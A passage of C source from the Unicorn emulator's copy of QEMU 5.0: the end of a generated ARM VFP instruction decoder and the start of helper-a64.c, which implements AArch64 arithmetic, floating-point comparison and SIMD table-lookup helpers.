.1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....1110 1.01.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:136 */ if (trans_VFNMS_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00a00000: /* ....1110 1.1..... ....1010 .0.0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.10.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:133 */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); if (trans_VFMA_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.11.... ....1010 .0.0.... */ disas_vfp_extract_disas_vfp_Fmt_23(ctx, &u.f_disas_vfp10, insn); switch (insn & 0x000000a0) { case 0x00000000: /* ....1110 1.11.... ....1010 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:143 */ if (trans_VMOV_imm_sp(ctx, &u.f_disas_vfp10)) return true; return false; } return false; } return false; case 0x00a00010: /* ....1110 1.1..... ....1010 .0.1.... */ disas_vfp_extract_disas_vfp_Fmt_13(ctx, &u.f_disas_vfp5, insn); switch (insn & 0x004000af) { case 0x00400000: /* ....1110 111..... ....1010 00010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:76 */ if (trans_VMSR_VMRS(ctx, &u.f_disas_vfp5)) return true; return false; } return false; case 0x00a00040: /* ....1110 1.1..... ....1010 .1.0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.10.... ....1010 .1.0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:134 */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); if (trans_VFMS_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.11.... ....1010 .1.0.... */ switch (insn & 0x000a0000) { case 0x00000000: /* ....1110 1.110.0. ....1010 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11000. ....1010 .1.0.... */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); switch (insn & 0x00010080) { case 0x00000000: /* ....1110 1.110000 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:148 */ if (trans_VMOV_reg_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00000080: /* ....1110 1.110000 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:151 */ if (trans_VABS_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010000: /* ....1110 1.110001 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:154 */ if (trans_VNEG_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010080: /* ....1110 1.110001 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:157 */ if (trans_VSQRT_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x1: /* ....1110 1.11010. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:160 */ disas_vfp_extract_disas_vfp_Fmt_25(ctx, &u.f_disas_vfp11, insn); if (trans_VCMP_sp(ctx, &u.f_disas_vfp11)) return true; return false; } return false; case 0x00020000: /* ....1110 1.110.1. ....1010 .1.0.... */ switch (insn & 0x00050000) { case 0x00000000: /* ....1110 1.110010 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:166 */ disas_vfp_extract_disas_vfp_Fmt_27(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f32_f16(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00010000: /* ....1110 1.110011 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:173 */ disas_vfp_extract_disas_vfp_Fmt_27(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f16_f32(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00040000: /* ....1110 1.110110 ....1010 .1.0.... */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110110 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:178 */ if (trans_VRINTR_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110110 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:181 */ if (trans_VRINTZ_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x00050000: /* ....1110 1.110111 ....1010 .1.0.... */ switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110111 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:184 */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); if (trans_VRINTX_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110111 ....1010 11.0.... 
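(single-to-double VCVT: the dm_ds extractor below builds vd as a double-precision D:Vd index and vm as a single-precision Vm:M index)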
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:189 */ disas_vfp_extract_vfp_dm_ds(ctx, &u.f_disas_vfp1, insn); if (trans_VCVT_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x00080000: /* ....1110 1.111.0. ....1010 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11100. ....1010 .1.0.... */ disas_vfp_extract_disas_vfp_Fmt_30(ctx, &u.f_disas_vfp13, insn); switch ((insn >> 16) & 0x1) { case 0x0: /* ....1110 1.111000 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:193 */ if (trans_VCVT_int_sp(ctx, &u.f_disas_vfp13)) return true; return false; } return false; case 0x1: /* ....1110 1.11110. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:212 */ disas_vfp_extract_disas_vfp_Fmt_34(ctx, &u.f_disas_vfp15, insn); if (trans_VCVT_sp_int(ctx, &u.f_disas_vfp15)) return true; return false; } return false; case 0x000a0000: /* ....1110 1.111.1. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:206 */ disas_vfp_extract_disas_vfp_Fmt_32(ctx, &u.f_disas_vfp14, insn); if (trans_VCVT_fix_sp(ctx, &u.f_disas_vfp14)) return true; return false; } return false; } return false; } return false; case 0x0e000b00: /* ....1110 ........ ....1011 ........ */ switch (insn & 0x00100010) { case 0x00000000: /* ....1110 ...0.... ....1011 ...0.... */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); switch (insn & 0x00a00040) { case 0x00000000: /* ....1110 0.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:107 */ if (trans_VMLA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00000040: /* ....1110 0.00.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:110 */ if (trans_VMLS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200000: /* ....1110 0.10.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:119 */ if (trans_VMUL_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200040: /* ....1110 0.10.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:122 */ if (trans_VNMUL_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800000: /* ....1110 1.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:131 */ if (trans_VDIV_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00000: /* ....1110 1.10.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:138 */ if (trans_VFMA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00040: /* ....1110 1.10.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:139 */ if (trans_VFMS_dp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00000010: /* ....1110 ...0.... ....1011 ...1.... */ switch (insn & 0x0080000f) { case 0x00000000: /* ....1110 0..0.... ....1011 ...10000 */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....1110 00.0.... ....1011 ...10000 */ switch ((insn >> 5) & 0x1) { case 0x0: /* ....1110 00.0.... 
....1011 ..010000 */ disas_vfp_extract_disas_vfp_Fmt_11(ctx, &u.f_disas_vfp3, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* ....1110 00.0.... ....1011 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:70 */ if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x1: /* ....1110 00.0.... ....1011 ..110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:68 */ disas_vfp_extract_disas_vfp_Fmt_10(ctx, &u.f_disas_vfp3, insn); if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x1: /* ....1110 01.0.... ....1011 ...10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:66 */ disas_vfp_extract_disas_vfp_Fmt_9(ctx, &u.f_disas_vfp3, insn); if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x00800000: /* ....1110 1..0.... ....1011 ...10000 */ disas_vfp_extract_disas_vfp_Fmt_12(ctx, &u.f_disas_vfp4, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* ....1110 1..0.... ....1011 .0.10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:73 */ if (trans_VDUP(ctx, &u.f_disas_vfp4)) return true; return false; } return false; } return false; case 0x00100000: /* ....1110 ...1.... ....1011 ...0.... */ switch (insn & 0x00a00040) { case 0x00000000: /* ....1110 0.01.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:113 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VNMLS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00000040: /* ....1110 0.01.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:116 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VNMLA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200000: /* ....1110 0.11.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:125 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VADD_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200040: /* ....1110 0.11.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:128 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VSUB_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800000: /* ....1110 1.01.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:140 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VFNMA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800040: /* ....1110 1.01.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:141 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VFNMS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00000: /* ....1110 1.11.... ....1011 .0.0.... */ disas_vfp_extract_disas_vfp_Fmt_24(ctx, &u.f_disas_vfp10, insn); switch (insn & 0x000000a0) { case 0x00000000: /* ....1110 1.11.... ....1011 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:145 */ if (trans_VMOV_imm_dp(ctx, &u.f_disas_vfp10)) return true; return false; } return false; case 0x00a00040: /* ....1110 1.11.... 
....1011 .1.0.... */ switch (insn & 0x000a0000) { case 0x00000000: /* ....1110 1.110.0. ....1011 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11000. ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); switch (insn & 0x00010080) { case 0x00000000: /* ....1110 1.110000 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:149 */ if (trans_VMOV_reg_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00000080: /* ....1110 1.110000 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:152 */ if (trans_VABS_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010000: /* ....1110 1.110001 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:155 */ if (trans_VNEG_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010080: /* ....1110 1.110001 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:158 */ if (trans_VSQRT_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x1: /* ....1110 1.11010. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:162 */ disas_vfp_extract_disas_vfp_Fmt_26(ctx, &u.f_disas_vfp11, insn); if (trans_VCMP_dp(ctx, &u.f_disas_vfp11)) return true; return false; } return false; case 0x00020000: /* ....1110 1.110.1. ....1011 .1.0.... */ switch (insn & 0x00050000) { case 0x00000000: /* ....1110 1.110010 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:168 */ disas_vfp_extract_disas_vfp_Fmt_28(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f64_f16(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00010000: /* ....1110 1.110011 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:175 */ disas_vfp_extract_disas_vfp_Fmt_29(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f16_f64(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00040000: /* ....1110 1.110110 ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110110 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:179 */ if (trans_VRINTR_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110110 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:182 */ if (trans_VRINTZ_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x00050000: /* ....1110 1.110111 ....1011 .1.0.... */ switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110111 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:185 */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); if (trans_VRINTX_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110111 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:190 */ disas_vfp_extract_vfp_dm_sd(ctx, &u.f_disas_vfp1, insn); if (trans_VCVT_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x00080000: /* ....1110 1.111.0. ....1011 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11100. 
....1011 .1.0.... */ switch ((insn >> 16) & 0x1) { case 0x0: /* ....1110 1.111000 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:195 */ disas_vfp_extract_disas_vfp_Fmt_31(ctx, &u.f_disas_vfp13, insn); if (trans_VCVT_int_dp(ctx, &u.f_disas_vfp13)) return true; return false; case 0x1: /* ....1110 1.111001 ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_sd(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x1: /* ....1110 1.111001 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:199 */ if (trans_VJCVT(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x1: /* ....1110 1.11110. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:214 */ disas_vfp_extract_disas_vfp_Fmt_35(ctx, &u.f_disas_vfp15, insn); if (trans_VCVT_dp_int(ctx, &u.f_disas_vfp15)) return true; return false; } return false; case 0x000a0000: /* ....1110 1.111.1. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:208 */ disas_vfp_extract_disas_vfp_Fmt_33(ctx, &u.f_disas_vfp14, insn); if (trans_VCVT_fix_dp(ctx, &u.f_disas_vfp14)) return true; return false; } return false; } return false; case 0x00100010: /* ....1110 ...1.... ....1011 ...1.... */ switch (insn & 0x0040000f) { case 0x00000000: /* ....1110 .0.1.... ....1011 ...10000 */ switch ((insn >> 5) & 0x1) { case 0x0: /* ....1110 .0.1.... ....1011 ..010000 */ disas_vfp_extract_disas_vfp_Fmt_8(ctx, &u.f_disas_vfp2, insn); switch (insn & 0x00800040) { case 0x00000000: /* ....1110 00.1.... ....1011 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:63 */ if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; case 0x1: /* ....1110 .0.1.... ....1011 ..110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:61 */ disas_vfp_extract_disas_vfp_Fmt_7(ctx, &u.f_disas_vfp2, insn); if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; case 0x00400000: /* ....1110 .1.1.... ....1011 ...10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:59 */ disas_vfp_extract_disas_vfp_Fmt_6(ctx, &u.f_disas_vfp2, insn); if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; } return false; } return false; }

unicorn-2.1.1/qemu/target/arm/helper-a64.c

/* * AArch64 specific helpers * * Copyright (c) 2013 Alexander Graf <agraf@suse.de> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/log.h" #include "qemu/bitops.h" #include "internals.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/int128.h" #include "qemu/atomic128.h" #include "tcg/tcg.h" #include "fpu/softfloat.h" #include <uc_priv.h> /* C2.4.7 Multiply and divide */ /* special cases for 0 and LLONG_MIN are mandated by the standard */ uint64_t HELPER(udiv64)(uint64_t num, uint64_t den) { if (den == 0) { return 0; } return num / den; } int64_t HELPER(sdiv64)(int64_t num, int64_t den) { if (den == 0) { return 0; } if (num == LLONG_MIN && den == -1) { return LLONG_MIN; } return num / den; } uint64_t HELPER(rbit64)(uint64_t x) { return revbit64(x); } void HELPER(msr_i_spsel)(CPUARMState *env, uint32_t imm) { update_spsel(env, imm); } static void daif_check(CPUARMState *env, uint32_t op, uint32_t imm, uintptr_t ra) { /* DAIF update to PSTATE. This is OK from EL0 only if UMA is set. */ if (arm_current_el(env) == 0 && !(arm_sctlr(env, 0) & SCTLR_UMA)) { raise_exception_ra(env, EXCP_UDEF, syn_aa64_sysregtrap(0, extract32(op, 0, 3), extract32(op, 3, 3), 4, imm, 0x1f, 0), exception_target_el(env), ra); } } void HELPER(msr_i_daifset)(CPUARMState *env, uint32_t imm) { daif_check(env, 0x1e, imm, GETPC()); env->daif |= (imm << 6) & PSTATE_DAIF; } void HELPER(msr_i_daifclear)(CPUARMState *env, uint32_t imm) { daif_check(env, 0x1f, imm, GETPC()); env->daif &= ~((imm << 6) & PSTATE_DAIF); } /* Convert a softfloat float_relation_ (as returned by * the float*_compare functions) to the correct ARM * NZCV flag state. 
*/ static inline uint32_t float_rel_to_flags(int res) { uint64_t flags; switch (res) { case float_relation_equal: flags = PSTATE_Z | PSTATE_C; break; case float_relation_less: flags = PSTATE_N; break; case float_relation_greater: flags = PSTATE_C; break; case float_relation_unordered: default: flags = PSTATE_C | PSTATE_V; break; } return flags; } uint64_t HELPER(vfp_cmph_a64)(uint32_t x, uint32_t y, void *fp_status) { return float_rel_to_flags(float16_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmpeh_a64)(uint32_t x, uint32_t y, void *fp_status) { return float_rel_to_flags(float16_compare(x, y, fp_status)); } uint64_t HELPER(vfp_cmps_a64)(float32 x, float32 y, void *fp_status) { return float_rel_to_flags(float32_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmpes_a64)(float32 x, float32 y, void *fp_status) { return float_rel_to_flags(float32_compare(x, y, fp_status)); } uint64_t HELPER(vfp_cmpd_a64)(float64 x, float64 y, void *fp_status) { return float_rel_to_flags(float64_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmped_a64)(float64 x, float64 y, void *fp_status) { return float_rel_to_flags(float64_compare(x, y, fp_status)); } float32 HELPER(vfp_mulxs)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); if ((float32_is_zero(a) && float32_is_infinity(b)) || (float32_is_infinity(a) && float32_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float32((1U << 30) | ((float32_val(a) ^ float32_val(b)) & (1U << 31))); } return float32_mul(a, b, fpst); } float64 HELPER(vfp_mulxd)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); if ((float64_is_zero(a) && float64_is_infinity(b)) || (float64_is_infinity(a) && float64_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float64((1ULL << 62) | ((float64_val(a) ^ float64_val(b)) & (1ULL << 63))); } return float64_mul(a, b, fpst); } uint64_t HELPER(simd_tbl)(CPUARMState *env, uint64_t result, uint64_t indices, uint32_t rn, uint32_t numregs) { /* Helper function for SIMD TBL and TBX. We have to do the table * lookup part for the 64 bits worth of indices we're passed in. * result is the initial results vector (either zeroes for TBL * or some guest values for TBX), rn the register number where * the table starts, and numregs the number of registers in the table. * We return the results of the lookups. */ int shift; for (shift = 0; shift < 64; shift += 8) { int index = extract64(indices, shift, 8); if (index < 16 * numregs) { /* Convert index (a byte offset into the virtual table * which is a series of 128-bit vectors concatenated) * into the correct register element plus a bit offset * into that element, bearing in mind that the table * can wrap around from V31 to V0. 
*/ int elt = (rn * 2 + (index >> 3)) % 64; int bitidx = (index & 7) * 8; uint64_t *q = aa64_vfp_qreg(env, elt >> 1); uint64_t val = extract64(q[elt & 1], bitidx, 8); result = deposit64(result, shift, 8, val); } } return result; } /* 64bit/double versions of the neon float compare functions */ uint64_t HELPER(neon_ceq_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_eq_quiet(a, b, fpst); } uint64_t HELPER(neon_cge_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_le(b, a, fpst); } uint64_t HELPER(neon_cgt_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; return -float64_lt(b, a, fpst); } /* Reciprocal step and sqrt step. Note that unlike the A32/T32 * versions, these do a fully fused multiply-add or * multiply-add-and-halve. */ #define float16_two make_float16(0x4000) #define float16_three make_float16(0x4200) #define float16_one_point_five make_float16(0x3e00) #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_one_point_five make_float32(0x3fc00000) #define float64_two make_float64(0x4000000000000000ULL) #define float64_three make_float64(0x4008000000000000ULL) #define float64_one_point_five make_float64(0x3FF8000000000000ULL) uint32_t HELPER(recpsf_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); a = float16_chs(a); if ((float16_is_infinity(a) && float16_is_zero(b)) || (float16_is_infinity(b) && float16_is_zero(a))) { return float16_two; } return float16_muladd(a, b, float16_two, 0, fpst); } float32 HELPER(recpsf_f32)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); a = float32_chs(a); if ((float32_is_infinity(a) && float32_is_zero(b)) || (float32_is_infinity(b) && float32_is_zero(a))) { return float32_two; } return float32_muladd(a, b, float32_two, 0, fpst); } float64 HELPER(recpsf_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); a = float64_chs(a); if ((float64_is_infinity(a) && float64_is_zero(b)) || (float64_is_infinity(b) && float64_is_zero(a))) { return float64_two; } return float64_muladd(a, b, float64_two, 0, fpst); } uint32_t HELPER(rsqrtsf_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); a = float16_chs(a); if ((float16_is_infinity(a) && float16_is_zero(b)) || (float16_is_infinity(b) && float16_is_zero(a))) { return float16_one_point_five; } return float16_muladd(a, b, float16_three, float_muladd_halve_result, fpst); } float32 HELPER(rsqrtsf_f32)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); a = float32_chs(a); if ((float32_is_infinity(a) && float32_is_zero(b)) || (float32_is_infinity(b) && float32_is_zero(a))) { return float32_one_point_five; } return float32_muladd(a, b, float32_three, float_muladd_halve_result, fpst); } float64 HELPER(rsqrtsf_f64)(float64 a, float64 b, void *fpstp) { float_status *fpst = fpstp; a = float64_squash_input_denormal(a, fpst); b = float64_squash_input_denormal(b, fpst); a = float64_chs(a); if ((float64_is_infinity(a) && float64_is_zero(b)) || (float64_is_infinity(b) && 
